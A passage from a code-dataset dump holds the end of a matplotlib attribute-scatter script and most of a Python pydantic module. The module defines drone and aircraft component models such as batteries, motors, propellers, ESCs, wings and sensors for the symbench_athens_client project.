len(Attributes)\n\nfigure(figsize=(12,12))\nhold(True)\n\nfor m1 in range(NumAtr):\n for m2 in range(NumAtr):\n subplot(NumAtr, NumAtr, m1*NumAtr + m2 + 1)\n for c in range(C):\n class_mask = (y==c)\n plot(X[class_mask,Attributes[m2]], X[class_mask,Attributes[m1]], '.')\n if m1==NumAtr-1:\n xlabel(attributeNames[Attributes[m2]])\n else:\n xticks([])\n if m2==0:\n ylabel(attributeNames[Attributes[m1]])\n else:\n yticks([])\n #ylim(0,X.max()*1.1)\n #xlim(0,X.max()*1.1)\nlegend(classNames)\nshow()\n\n\n\n","repo_name":"Rajashan/DTU-ML_intro","sub_path":"project1_code.py","file_name":"project1_code.py","file_ext":"py","file_size_in_byte":9489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21377531406","text":"import csv\nimport json\nfrom typing import ClassVar, Dict, Optional, Tuple, Union\n\nfrom pydantic import BaseModel, Field, root_validator, validator\n\nfrom symbench_athens_client.utils import (\n get_data_file_path,\n inject_none_for_missing_fields_and_nans,\n)\n\n\nclass Component(BaseModel):\n \"\"\"The Base Component Class\"\"\"\n\n __swap_aliases__: ClassVar[Dict[str, str]] = {}\n\n name: str = Field(\n ...,\n description=\"The name of the component as is in the graph database\",\n alias=\"Name\",\n )\n\n model: str = Field(..., description=\"Model name of the Component\", alias=\"MODEL\")\n\n classification: str = Field(\n \"Battery\",\n description=\"The component type for this battery. Redundant but useful info\",\n alias=\"Classification\",\n )\n\n corpus: str = Field(\n ..., description=\"The corpus for which this element belongs to\", alias=\"Corpus\"\n )\n\n @property\n def prt_file(self) -> Optional[str]:\n return None\n\n def __repr__(self):\n return f\"<{self.__class__.__name__}, Category: {self.classification}, Name: {self.name}>\"\n\n def __str__(self):\n return repr(self)\n\n def dict(\n self,\n *,\n include: Union[\"AbstractSetIntStr\", \"MappingIntStrAny\"] = None,\n exclude: Union[\"AbstractSetIntStr\", \"MappingIntStrAny\"] = None,\n by_alias: bool = False,\n skip_defaults: bool = None,\n exclude_unset: bool = False,\n exclude_defaults: bool = False,\n exclude_none: bool = False,\n ) -> \"DictStrAny\":\n comp_dict = super().dict(\n include=include,\n exclude=exclude,\n by_alias=by_alias,\n skip_defaults=skip_defaults,\n exclude_unset=exclude_unset,\n exclude_defaults=exclude_defaults,\n exclude_none=exclude_none,\n )\n if by_alias and self.should_swap_aliases():\n for key, value in self.__swap_aliases__.items():\n if value in comp_dict:\n comp_dict[key] = comp_dict.pop(value)\n return comp_dict\n\n def should_swap_aliases(self):\n return False\n\n @root_validator(pre=True)\n def inject_model(cls, values):\n if \"Model\" in values:\n values[\"MODEL\"] = values.pop(\"Model\")\n\n if not values.get(\"model\", values.get(\"MODEL\", values.get(\"Model\"))):\n values[\"model\"] = values.get(\"name\", values.get(\"Name\"))\n\n for original, replace in cls.__swap_aliases__.items():\n if original in values:\n values[replace] = values.pop(original)\n\n return values\n\n @validator(\"corpus\")\n def check_corpus(cls, corpus):\n if corpus not in {\"uav\", \"uam\"}:\n raise ValueError(\"Corpus can only be either `uav` or `uam`\")\n return corpus\n\n class Config:\n allow_mutation = False\n allow_population_by_field_name = True\n extra = \"forbid\"\n\n\nclass Battery(Component):\n __swap_aliases__ = {\"BASE_VOLTAGE\": \"VOLTAGE\"}\n\n \"\"\"The Battery Component\n An example of a battery attributes in the Graph database is shown below:\n\n\n \"PEAK_DISCHARGE_RATE\": \"150\",\n \"NUMBER_OF_CELLS\": \"4S1P\",\n \"THICKNESS\": \"34\",\n \"CONT_DISCHARGE_RATE\": \"75\",\n \"VOLTAGE\": \"14.8\",\n \"CAPACITY\": \"6000\",\n \"DISCHARGE_PLUG\": \"XT90\",\n \"WIDTH\": \"69\",\n \"CHEMISTRY_TYPE\": \"LiPo\",\n \"COST\": \"99.8\",\n \"PACK_RESISTANCE\": \"9.0\",\n \"MODEL\": \"TurnigyGraphene6000mAh4S75C\",\n \"WEIGHT\": \"0.8\",\n \"LENGTH\": \"168.0\",\n \"Classification\": \"Battery\"\n \"\"\"\n battery_type: Optional[str] = Field(\n default=None, alias=\"BATTERY_TYPE\", description=\"The Battery Type\"\n )\n\n peak_discharge_rate: float = Field(\n ...,\n description=\"Peak Discharge rate of the Battery\",\n alias=\"PEAK_DISCHARGE_RATE\",\n )\n\n number_of_cells: Optional[str] = Field(\n None, description=\"Number of cells\", alias=\"NUMBER_OF_CELLS\"\n )\n\n thickness: float = Field(..., description=\"Thickness\", alias=\"THICKNESS\")\n\n cont_discharge_rate: float = Field(\n ..., description=\"Continuous Discharge Rate\", alias=\"CONT_DISCHARGE_RATE\"\n )\n\n voltage: float = Field(..., description=\"Voltage\", alias=\"VOLTAGE\")\n\n capacity: float = Field(\n ..., description=\"Capacity of the Battery\", alias=\"CAPACITY\"\n )\n\n discharge_plug: Optional[str] = Field(\n None, description=\"Discharge Plug Details\", alias=\"DISCHARGE_PLUG\"\n )\n\n width: Optional[float] = Field(\n None, description=\"Width of the Battery\", alias=\"WIDTH\"\n )\n\n chemistry_type: Optional[str] = Field(\n None, description=\"Chemistry Type of the Battery\", alias=\"CHEMISTRY_TYPE\"\n )\n\n cost: Optional[float] = Field(None, description=\"Cost of the Battery\", alias=\"COST\")\n\n pack_resistance: Optional[float] = Field(\n None, description=\"Pack Resistance of the Battery\", alias=\"PACK_RESISTANCE\"\n )\n\n weight: Optional[float] = Field(\n None,\n description=\"Weight of the Battery\",\n alias=\"WEIGHT\",\n )\n\n length: Optional[float] = Field(\n None, description=\"Length of the Battery\", alias=\"LENGTH\"\n )\n\n chord_1: Optional[float] = Field(None, description=\"Chord 1\", alias=\"CHORD_1\")\n\n chord_2: Optional[float] = Field(None, description=\"Chord 2\", alias=\"CHORD_2\")\n\n module_mass: Optional[float] = Field(\n None, description=\"Module Mass\", alias=\"MODULE_MASS\"\n )\n\n module_volume: Optional[float] = Field(\n None, description=\"Module Volume\", alias=\"MODULE_VOLUME\"\n )\n\n mount_side: Optional[float] = Field(\n None, description=\"Mount Side\", alias=\"MOUNT_SIDE\"\n )\n\n span: Optional[float] = Field(None, description=\"Span\", alias=\"SPAN\")\n\n taper_offset: Optional[float] = Field(\n None, description=\"TAPER_OFFSET\", alias=\"TAPER_OFFSET\"\n )\n\n voltage_request: Optional[float] = Field(\n None, description=\"Voltage Request\", alias=\"VOLTAGE_REQUEST\"\n )\n\n volume_percent: Optional[float] = Field(\n None, description=\"VOLUME_PERCENT\", alias=\"VOLUME_PERCENT\"\n )\n\n @property\n def prt_file(self) -> Optional[str]:\n return \"para_battery.prt\" if self.corpus == \"uav\" else \"mega_battery.prt\"\n\n def should_swap_aliases(self):\n return self.corpus == \"uam\"\n\n def to_fd_inp(self):\n return {\n \"num_cells\": int(self.number_of_cells[0]),\n \"voltage\": self.voltage,\n \"capacity\": self.capacity,\n \"C_Continuous\": self.cont_discharge_rate,\n \"C_Peak\": self.peak_discharge_rate,\n }\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n if \"Chemistry Type\" in values:\n values[\"CHEMISTRY_TYPE\"] = values.pop(\"Chemistry Type\")\n if \"Discharge Plug\" in values:\n values[\"DISCHARGE_PLUG\"] = values.pop(\"Discharge Plug\")\n if \"Number of Cells\" in values:\n values[\"NUMBER_OF_CELLS\"] = values.pop(\"Number of Cells\")\n return values\n\n\nclass BatteryController(Component):\n input_voltage: float = Field(\n ..., description=\"Input Voltage\", alias=\"Input_Voltage\"\n )\n\n output_voltage: float = Field(\n ..., description=\"Output Voltage\", alias=\"Output_Voltage\"\n )\n\n\nclass Propeller(Component):\n \"\"\"The propeller component\n\n An example of a propeller attributes can be seen below:\n \"PITCH\": \"226.06\",\n \"SHAFT_DIAMETER\": \"6.35\",\n \"HUB_THICKNESS\": \"15.24\",\n \"Performance_File\": \"PER3_88x89.dat\",\n \"DIAMETER\": \"223.52\",\n \"Direction\": \"1\",\n \"Weight\": \"0.02608\",\n \"MODEL\": \"apc_propellers_8_8x8_9\",\n \"Classification\": \"Propeller\"\n \"\"\"\n\n hub_thickness: float = Field(\n ..., description=\"HUB_THICKNESS\", alias=\"HUB_THICKNESS\"\n )\n\n diameter: float = Field(..., description=\"Diameter\", alias=\"DIAMETER\")\n\n direction: int = Field(..., description=\"Direction\", alias=\"Direction\")\n\n performance_file: str = Field(\n ..., description=\"Performance file location/name\", alias=\"Performance_File\"\n )\n\n shaft_diameter: float = Field(\n ..., description=\"The shaft diameter of the propeller\", alias=\"SHAFT_DIAMETER\"\n )\n\n pitch: float = Field(..., description=\"The pitch of the propeller\", alias=\"PITCH\")\n\n weight: float = Field(..., description=\"Weight of the propeller\", alias=\"WEIGHT\")\n\n prop_type: Optional[int] = Field(\n default=None, description=\"The propeller type\", alias=\"Prop_type\"\n )\n\n @property\n def prt_file(self) -> Optional[str]:\n return \"para_prop.prt\"\n\n def to_fd_inp(self, data_path):\n return {\n \"cname\": f\"'{self.name}'\",\n \"ctype\": \"'MR'\",\n \"prop_fname\": f\"'{str(data_path)}{self.performance_file}'\"\n if data_path\n else f\"'{self.performance_file}'\",\n \"Ir\": (self.weight * self.diameter**2 / 12.0),\n \"x\": None,\n \"y\": None,\n \"z\": None,\n \"nx\": None,\n \"ny\": None,\n \"nz\": None,\n \"radius\": self.diameter / 2,\n \"spin\": int(self.direction),\n }\n\n @root_validator(pre=True)\n def validate_propeller_attributes(cls, values):\n if \"Weight\" in values:\n values[\"WEIGHT\"] = values.pop(\"Weight\")\n return values\n\n\nclass Motor(Component):\n \"\"\"The Motor Component in the graph database\n\n An example of motor attributes is shown below:\n\n \"MAX_POWER\": \"44.0\",\n \"TOTAL_LENGTH\": \"26.0\",\n \"CAN_DIAMETER\": \"17.7\",\n \"IO_IDLE_CURRENT@10V\": \"0.2\",\n \"SHAFT_DIAMETER\": \"4.0\",\n \"KT\": \"0.0030804182533915227\",\n \"Max # of Cells\": \"2.0\",\n \"LENGTH\": \"12.0\",\n \"PROP_PITCH_REC.\": \"2,3\",\n \"PROP_SIZE_REC.\": \"6,7\",\n \"MODEL\": \"MT13063100KV\",\n \"ESC/BEC Class\": \"3.0\",\n \"CAN_LENGTH\": \"6.0\",\n \"KM\": \"0.012371257411140733\",\n \"INTERNAL_RESISTANCE\": \"62.0\",\n \"Min # of Cells\": \"1.0\",\n \"MAX_CURRENT\": \"6.0\",\n \"COST\": \"41.9\",\n \"CONTROL_CHANNEL\": \"none\",\n \"WEIGHT\": \"0.0112\",\n \"KV\": \"3100.0\",\n \"Poles\": \"9N12P\",\n \"Classification\": \"Motor\"\n \"\"\"\n\n __swap_aliases__ = {\n \"ESC/BEC Class\": \"ESC_BEC_Class\",\n \"Max # of Cells\": \"Max_Cells\",\n \"Min # of Cells\": \"Min_Cells\",\n \"IO_IDLE_CURRENT@10V\": \"IO_IDLE_CURRENT_10V\",\n \"PROP_SIZE_REC.\": \"PROP_SIZE_REC\",\n \"PROP_PITCH_REC.\": \"PROP_PITCH_REC\",\n }\n\n max_power: float = Field(\n ..., description=\"Max power of the motor\", alias=\"MAX_POWER\"\n )\n\n io_idle_current_at_10V: float = Field(\n ..., description=\"Maximum idle current at 10V\", alias=\"IO_IDLE_CURRENT_10V\"\n )\n\n length: float = Field(..., description=\"Length of the Motor\", alias=\"LENGTH\")\n\n kt: float = Field(..., description=\"The KT rating of the Motor\", alias=\"KT\")\n\n esc_bec_class: Optional[float] = Field(\n ..., description=\"The ESC/BEC Class\", alias=\"ESC_BEC_Class\"\n )\n\n can_length: float = Field(..., description=\"The can length\", alias=\"CAN_LENGTH\")\n\n total_length: float = Field(..., description=\"Total length\", alias=\"TOTAL_LENGTH\")\n\n km: float = Field(..., description=\"KM rating of the motor\", alias=\"KM\")\n\n shaft_diameter: float = Field(\n ..., description=\"The shaft diameter of the motor\", alias=\"SHAFT_DIAMETER\"\n )\n\n weight: float = Field(..., description=\"Weight of the motor\", alias=\"WEIGHT\")\n\n poles: Optional[str] = Field(\n ..., description=\"The poles of the motor\", alias=\"Poles\"\n )\n\n internal_resistance: float = Field(\n ..., description=\"Internal Resistance of the motor\", alias=\"INTERNAL_RESISTANCE\"\n )\n\n control_channel: int = Field(\n ..., description=\"The control channel\", alias=\"CONTROL_CHANNEL\"\n )\n\n adapter_length: Optional[Union[float, Tuple[float, float]]] = Field(\n ..., description=\"The adapter length\", alias=\"ADAPTER_LENGTH\"\n )\n\n max_current: float = Field(\n ..., description=\"Max current rating of the motor\", alias=\"MAX_CURRENT\"\n )\n\n max_no_cells: int = Field(\n ..., description=\"Max number of cells in the motor\", alias=\"Max_Cells\"\n )\n\n kv: float = Field(..., description=\"The KV rating of the motor\", alias=\"KV\")\n\n cost: float = Field(..., description=\"Cost of the motor\", alias=\"COST\")\n\n can_diameter: float = Field(\n ..., description=\"The can diameter of the motor\", alias=\"CAN_DIAMETER\"\n )\n\n min_no_cells: int = Field(\n ...,\n description=\"The minimum number of cells of the motor\",\n alias=\"Min_Cells\",\n )\n\n prop_size_rec: Optional[Union[float, Tuple[float, float]]] = Field(\n ...,\n description=\"The propsize rec\",\n alias=\"PROP_SIZE_REC\",\n )\n\n prop_pitch_rec: Optional[Union[float, Tuple[float, float]]] = Field(\n ..., description=\"The prop pitch rec\", alias=\"PROP_PITCH_REC\"\n )\n\n esc_pwm_rate_min: Optional[float] = Field(\n ..., description=\"ESC_PWM_RATE_MIN\", alias=\"ESC_PWM_RATE_MIN\"\n )\n\n adapter_diameter: Optional[Union[float, Tuple[float, float]]] = Field(\n ..., description=\"Adapter diameter\", alias=\"ADAPTER_DIAMETER\"\n )\n\n esc_pwm_rate_max: Optional[float] = Field(\n ..., description=\"ESC PWM RATE MAX\", alias=\"ESC_PWM_RATE_MAX\"\n )\n\n cost_adapter: Optional[float] = Field(\n ...,\n description=\"Adapter Cost\",\n alias=\"COST_ADAPTER\",\n )\n\n esc_rate: Optional[float] = Field(..., description=\"ESC_RATE\", alias=\"ESC_RATE\")\n\n @property\n def prt_file(self):\n return \"para_motor.prt\"\n\n def to_fd_inp(self):\n return {\n \"motor_fname\": f\"'../../Motors/{self.name}'\",\n \"KV\": self.kv,\n \"KT\": self.kt,\n \"I_max\": self.max_current,\n \"I_idle\": self.io_idle_current_at_10V,\n \"maxpower\": self.max_power,\n \"Rw\": self.internal_resistance / 1000.0,\n \"icontrol\": None,\n \"ibattery\": None,\n }\n\n def should_swap_aliases(self):\n return self.corpus == \"uav\"\n\n @validator(\"prop_size_rec\", pre=True, always=True)\n def validate_prop_pitch(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"prop_pitch_rec\", pre=True, always=True)\n def validate_prop_length(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"adapter_diameter\", pre=True, always=True)\n def validate_adapter_diameter(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"adapter_length\", pre=True, always=True)\n def validate_adapter_length(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"max_no_cells\", \"min_no_cells\", pre=True, always=True)\n def validate_int(cls, cell):\n return int(float(cell))\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n if \"CONTROL_CHANNEL\" in values and values[\"CONTROL_CHANNEL\"] == \"none\":\n values[\"CONTROL_CHANNEL\"] = None\n\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass ESC(Component):\n length: float = Field(..., description=\"Length of the ESC\", alias=\"LENGTH\")\n\n cont_amps: Optional[float] = Field(\n ..., description=\"Continuous ampere ratings\", alias=\"CONT_AMPS\"\n )\n\n max_voltage: float = Field(..., description=\"Maximum voltage\", alias=\"MAX_VOLTAGE\")\n\n bec: Optional[Union[float, Tuple]] = Field(\n ..., description=\"BEC_RATING\", alias=\"BEC\"\n )\n\n bec_output_cont_amps: Optional[Union[float, Tuple]] = Field(\n ...,\n description=\"Bec Output in continuous amps\",\n alias=\"BEC_OUTPUT_CONT_AMPS\",\n )\n\n bec_output_peak_amps: Optional[float] = Field(\n ..., description=\"Bec output peak amps\", alias=\"BEC_OUTPUT_PEAK_AMPS\"\n )\n\n cost: float = Field(..., description=\"Cost of the ESC Component\", alias=\"COST\")\n\n bec_output_voltage: Optional[Union[float, Tuple]] = Field(\n ..., description=\"Bec output voltage\", alias=\"BEC_OUTPUT_VOLTAGE\"\n )\n\n control_channel: int = Field(\n ..., description=\"Control Channel\", alias=\"CONTROL_CHANNEL\"\n )\n\n esc_bec_class: Optional[float] = Field(\n ..., description=\"The ESC/BEC Class\", alias=\"ESC/BEC Class\"\n )\n\n thickness: float = Field(..., description=\"THICKNESS\", alias=\"THICKNESS\")\n\n offset: float = Field(..., description=\"Offset\", alias=\"Offset\")\n\n mount_angle: float = Field(..., description=\"The mount angle\", alias=\"Mount_Angle\")\n\n tube_od: float = Field(..., description=\"The tube OD\", alias=\"TUBE_OD\")\n\n width: float = Field(..., description=\"The width of ESC\", alias=\"WIDTH\")\n\n weight: float = Field(..., description=\"The weight of ESC\", alias=\"WEIGHT\")\n\n peak_amps: Optional[float] = Field(\n ...,\n description=\"The Peak ampere ratings for the ESC controller\",\n alias=\"PEAK_AMPS\",\n )\n\n @property\n def prt_file(self):\n return \"para_esc.prt\"\n\n @validator(\"bec\", pre=True, always=True)\n def validate_bec(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"bec_output_voltage\", pre=True, always=True)\n def validate_bec_output_voltage(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @validator(\"bec_output_cont_amps\", pre=True, always=True)\n def validate_bec_output_cont_amps(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n if \"Control_Channel\" in values:\n values[\"CONTROL_CHANNEL\"] = values.pop(\"Control_Channel\")\n for field in [\"Offset\", \"Mount_Angle\", \"CONTROL_CHANNEL\", \"TUBE_OD\"]:\n if field in values and values[field] == \"none\":\n values[field] = None\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass Instrument_Battery(Battery):\n \"\"\"The Instrument Battery Component\"\"\"\n\n @property\n def prt_file(self) -> Optional[str]:\n return None\n\n\nclass Wing(Component):\n \"\"\"The Wing Component\"\"\"\n\n span: float = Field(..., description=\"SPAN property\", alias=\"SPAN\")\n\n aileron_bias: Optional[float] = Field(..., description=\"BIAS\", alias=\"AILERON_BIAS\")\n\n aoa_cl_max: Optional[float] = Field(\n None, description=\"AoA_CL_Max\", alias=\"AoA_CL_Max\"\n )\n\n offset: Optional[float] = Field(None, description=\"OFFSET\", alias=\"OFFSET\")\n\n control_channel_flaps: Optional[int] = Field(\n None, description=\"CONTROL_CHANNEL_FLAPS\", alias=\"CONTROL_CHANNEL_FLAPS\"\n )\n\n cl_max: Optional[float] = Field(None, description=\"CL_Max\", alias=\"CL_Max\")\n\n cl_max_cd0_min: Optional[float] = Field(\n None, description=\"CL_Max_CD0_Min\", alias=\"CL_Max_CD0_Min\"\n )\n\n last_two: Optional[float] = Field(None, description=\"LAST_TWO\", alias=\"LASTTWO\")\n\n chord: Optional[float] = Field(None, description=\"CHORD\", alias=\"CHORD\")\n\n tube_offset: Optional[float] = Field(\n None, description=\"Tube Offset\", alias=\"TUBE_OFFSET\"\n )\n\n cl_ld_max: Optional[float] = Field(None, description=\"CL_LD_Max\", alias=\"CL_LD_Max\")\n\n servo_width: Optional[float] = Field(\n None, description=\"Servo Width\", alias=\"SERVO_WIDTH\"\n )\n\n aoa_l0: Optional[float] = Field(None, description=\"AOA_L0\", alias=\"AoA_L0\")\n\n dcl_daoa_slope: Optional[float] = Field(\n None, description=\"dCl_dAoA_Slope\", alias=\"dCl_dAoA_Slope\"\n )\n\n control_channel_ailerons: Optional[int] = Field(\n None, description=\"CONTROL_CHANNEL_AILERONS\", alias=\"CONTROL_CHANNEL_AILERONS\"\n )\n\n diameter: Optional[float] = Field(None, description=\"DIAMETER\", alias=\"DIAMETER\")\n\n ld_max: Optional[float] = Field(None, description=\"LD_Max\", alias=\"LD_Max\")\n\n servo_length: Optional[float] = Field(\n None, description=\"SERVO_LENGTH\", alias=\"SERVO_LENGTH\"\n )\n\n cd0_min: Optional[float] = Field(None, description=\"CD0_MIn\", alias=\"CD0_Min\")\n\n cd_min: Optional[float] = Field(None, description=\"CD_MIN\", alias=\"CD_Min\")\n\n cm0: Optional[float] = Field(None, description=\"CM0\", alias=\"CM0\")\n\n flap_bias: float = Field(..., description=\"Flap Bias\", alias=\"FLAP_BIAS\")\n\n chord_1: Optional[float] = Field(None, description=\"Chord 1\", alias=\"CHORD_1\")\n\n chord_2: Optional[float] = Field(None, description=\"Chord 1\", alias=\"CHORD_2\")\n\n load: Optional[float] = Field(None, description=\"Load\", alias=\"LOAD\")\n\n naca_profile: Optional[str] = Field(\n None, description=\"NACA Profile\", alias=\"NACA_Profile\"\n )\n\n taper_offset: Optional[float] = Field(\n None, description=\"Taper Offset\", alias=\"TAPER_OFFSET\"\n )\n\n thickness: Optional[float] = Field(None, description=\"Thickness\", alias=\"THICKNESS\")\n\n @property\n def prt_file(self):\n return (\n \"para_wing_left.prt\"\n if self.name.startswith(\"left\")\n else \"para_wing_right.prt\"\n )\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n for field in [\n \"SPAN\",\n \"AILERON_BIAS\",\n \"OFFSET\",\n \"SERVO_WIDTH\",\n \"SERVO_LENGTH\",\n \"CONTROL_CHANNEL_FLAPS\",\n \"DIAMETER\",\n \"FLAP_BIAS\",\n \"TUBE_OFFSET\",\n \"CONTROL_CHANNEL_AILERONS\",\n ]:\n if field in values and values[field] == \"none\":\n values[field] = None\n\n return values\n\n\nclass GPS(Component):\n \"\"\"The GPS Component\"\"\"\n\n min_voltage: Optional[float] = Field(\n ..., description=\"Minimum Voltage\", alias=\"MIN_VOLTAGE\"\n )\n\n output_rate: float = Field(..., description=\"Output Rate\", alias=\"OUTPUT_RATE\")\n\n max_voltage: Optional[float] = Field(\n ..., description=\"Maximum Voltage\", alias=\"MAX_VOLTAGE\"\n )\n\n power_consumption: float = Field(\n ..., description=\"Power Consumption\", alias=\"POWER_CONSUMPTION\"\n )\n\n max_current_range: Optional[float] = Field(\n ..., description=\"Max Current Range\", alias=\"MAX_CURRENT_RANGE\"\n )\n\n cost: float = Field(..., description=\"COST\", alias=\"Cost\")\n\n gps_loc: str = Field(..., description=\"GPS_Location\", alias=\"GPS_Location\")\n\n weight: float = Field(..., description=\"Weight of the GPS\", alias=\"WEIGHT\")\n\n number_of_gnss: float = Field(\n ..., description=\"NUMBER_of_GNSS\", alias=\"Number_of_GNSS\"\n )\n\n gps_accuracy: float = Field(..., description=\"GPS_ACCURACY\", alias=\"GPS_ACCURACY\")\n\n diameter: float = Field(..., description=\"Diameter\", alias=\"DIAMETER\")\n\n height: float = Field(..., description=\"Height\", alias=\"HEIGHT\")\n\n @property\n def prt_file(self):\n return \"para_gps.prt\"\n\n @root_validator(pre=True)\n def validate_gps_fields(cls, values):\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass Servo(Component):\n travel: float = Field(..., description=\"Travel\", alias=\"Travel\")\n\n LENF: float = Field(..., description=\"LenF\", alias=\"LENF\")\n\n min_stall_torque: float = Field(\n ..., description=\"Min_Stall_Torque\", alias=\"Min_Stall_Torque\"\n )\n\n output_shaft_spline: str = Field(\n ..., description=\"Output_Shaft_Spline\", alias=\"Output_Shaft_Spline\"\n )\n\n wire_gauge: float = Field(..., description=\"Wire_Gauge\", alias=\"Wire_Gauge\")\n\n current_no_load: float = Field(\n ..., description=\"Current at no load\", alias=\"Current_No_Load\"\n )\n\n deadband_width: float = Field(\n ..., description=\"Dead Band Width\", alias=\"Deadband_Width\"\n )\n\n weight: float = Field(..., description=\"WEIGHT\", alias=\"WEIGHT\")\n\n lend: float = Field(..., description=\"Lend\", alias=\"LEND\")\n\n min_no_load_speed: float = Field(\n ..., description=\"No load speed minimum\", alias=\"Min_No_Load_Speed\"\n )\n\n idle_current: float = Field(..., description=\"Current_Idle\", alias=\"Current_Idle\")\n\n max_voltage: float = Field(..., description=\"Max_Voltage\", alias=\"Max_Voltage\")\n\n len_e: float = Field(..., description=\"Lene\", alias=\"LENE\")\n\n max_stall_torque: float = Field(\n ..., description=\"Max stall torque\", alias=\"Max_Stall_Torque\"\n )\n\n max_rotation: float = Field(..., description=\"Max Rotation\", alias=\"Max_Rotation\")\n\n len_a: float = Field(..., description=\"Len A\", alias=\"LENA\")\n\n min_voltage: float = Field(..., description=\"Minimum Voltage\", alias=\"Min_Voltage\")\n\n len_c: float = Field(..., description=\"Len C\", alias=\"LENC\")\n\n max_no_load_speed: float = Field(\n ..., description=\"Max_No_Load_Speed\", alias=\"Max_No_Load_Speed\"\n )\n\n max_pwm_range: str = Field(..., description=\"Max PWM range\", alias=\"Max_PWM_Range\")\n\n len_b: float = Field(..., description=\"Len B\", alias=\"LENB\")\n\n stall_current: float = Field(\n ..., description=\"Stall Current\", alias=\"Stall_Current\"\n )\n\n servo_class: str = Field(..., description=\"Servo Class\", alias=\"Servo_Class\")\n\n @property\n def prt_file(self):\n return \"para_servo.prt\"\n\n\nclass Receiver(Component):\n max_voltage: float = Field(..., description=\"Maximum Voltage\", alias=\"MAX_VOLTAGE\")\n\n width: float = Field(..., description=\"Width\", alias=\"WIDTH\")\n\n height: float = Field(..., description=\"Height\", alias=\"HEIGHT\")\n\n weight: float = Field(..., description=\"Weight\", alias=\"WEIGHT\")\n\n min_voltage: float = Field(..., description=\"Minimum Voltage\", alias=\"MIN_VOLTAGE\")\n\n power_consumption: float = Field(\n ..., description=\"POWER_CONSUMPTION\", alias=\"POWER_CONSUMPTION\"\n )\n\n length: float = Field(..., description=\"Length\", alias=\"LENGTH\")\n\n cost: float = Field(..., description=\"Cost\", alias=\"Cost ($)\")\n\n max_no_channels: float = Field(\n ..., description=\"Maximum Number of Channels\", alias=\"Max_Number_of_Channels\"\n )\n\n @property\n def prt_file(self):\n return \"para_receiver.prt\"\n\n\nclass Sensor(Component):\n max_voltage: Optional[float] = Field(\n ..., description=\"Max Voltage\", alias=\"MAX_VOLTAGE\"\n )\n\n weight: float = Field(..., description=\"Weight\", alias=\"WEIGHT\")\n\n cost: float = Field(..., description=\"COST\", alias=\"Cost\")\n\n length: float = Field(..., description=\"LENGTH\", alias=\"LENGTH\")\n\n power_consumption: float = Field(\n ..., description=\"POWER_CONSUMPTION\", alias=\"POWER_CONSUMPTION\"\n )\n\n height: float = Field(..., description=\"Height\", alias=\"HEIGHT\")\n\n min_voltage: Optional[float] = Field(\n ..., description=\"MIN_VOLTAGE\", alias=\"MIN_VOLTAGE\"\n )\n\n voltage_precision: Optional[float] = Field(\n ..., description=\"VOLTAGE_PRECISION\", alias=\"VOLTAGE_PRECISION\"\n )\n\n width: float = Field(..., description=\"WIDTH\", alias=\"WIDTH\")\n\n max_altitude: Optional[float] = Field(\n ..., description=\"Max altitude\", alias=\"MAX_ALTITUDE\"\n )\n\n min_altitude: Optional[float] = Field(\n ..., description=\"Min altitude\", alias=\"MIN_ALTITUDE\"\n )\n\n altitude_precision: Optional[float] = Field(\n ..., description=\"Altitude Precision\", alias=\"ALTITUDE_PRECISION\"\n )\n\n max_rpm: Optional[float] = Field(..., description=\"Max rpm\", alias=\"MAX_RPM\")\n\n min_rpm: Optional[float] = Field(..., description=\"Min rpm\", alias=\"MIN_RPM\")\n\n max_temp: Optional[float] = Field(\n ..., description=\"Max Temperature\", alias=\"MAX_TEMP\"\n )\n\n min_temp: Optional[float] = Field(\n ..., description=\"Min Temperature\", alias=\"MIN_TEMP\"\n )\n\n @property\n def prt_file(self):\n return \"para_sensor.prt\"\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass Autopilot(Component):\n max_servo_rail_voltage: float = Field(\n ..., description=\"Max servo rail voltage\", alias=\"MAX_SERVO_RAIL_VOLTAGE\"\n )\n\n can: float = Field(..., description=\"can\", alias=\"CAN\")\n\n acc_gyro_1: str = Field(..., description=\"ACCGyro_1\", alias=\"AccGyro_1\")\n\n i2c: float = Field(..., description=\"I2C\", alias=\"I2C\")\n\n no_of_telem_inputs: float = Field(\n ..., description=\"No. of telem inputs\", alias=\"Number_of_Telem_Inputs\"\n )\n\n uart: Optional[float] = Field(..., description=\"UART\", alias=\"UART\")\n\n fmu_cached_memory: float = Field(\n ..., description=\"FMU_CACHED_MEMORY\", alias=\"FMU_CACHED_MEMORY\"\n )\n\n width: float = Field(..., description=\"WIDTH\", alias=\"WIDTH\")\n\n magnetometer: str = Field(..., description=\"Magnetometer\", alias=\"Magnetometer\")\n\n acc_gyro_3: Optional[str] = Field(..., description=\"AccGyro_3\", alias=\"AccGyro_3\")\n\n cost: float = Field(..., description=\"Cost\", alias=\"COST\")\n\n height: float = Field(..., description=\"height\", alias=\"HEIGHT\")\n\n main_fmu_processor: str = Field(\n ..., description=\"MAIN_FMU_PROCESSOR\", alias=\"Main_FMU_Processor\"\n )\n\n no_of_input_batteries: str = Field(\n ..., description=\"No. of input batteries\", alias=\"Number_of_Input_Batteries\"\n )\n\n weight: float = Field(..., description=\"Weight\", alias=\"WEIGHT\")\n\n fmu_bits: float = Field(..., description=\"FMU_Bits\", alias=\"FMU_Bits\")\n\n input_voltage: Optional[Union[float, Tuple[float, float]]] = Field(\n ..., 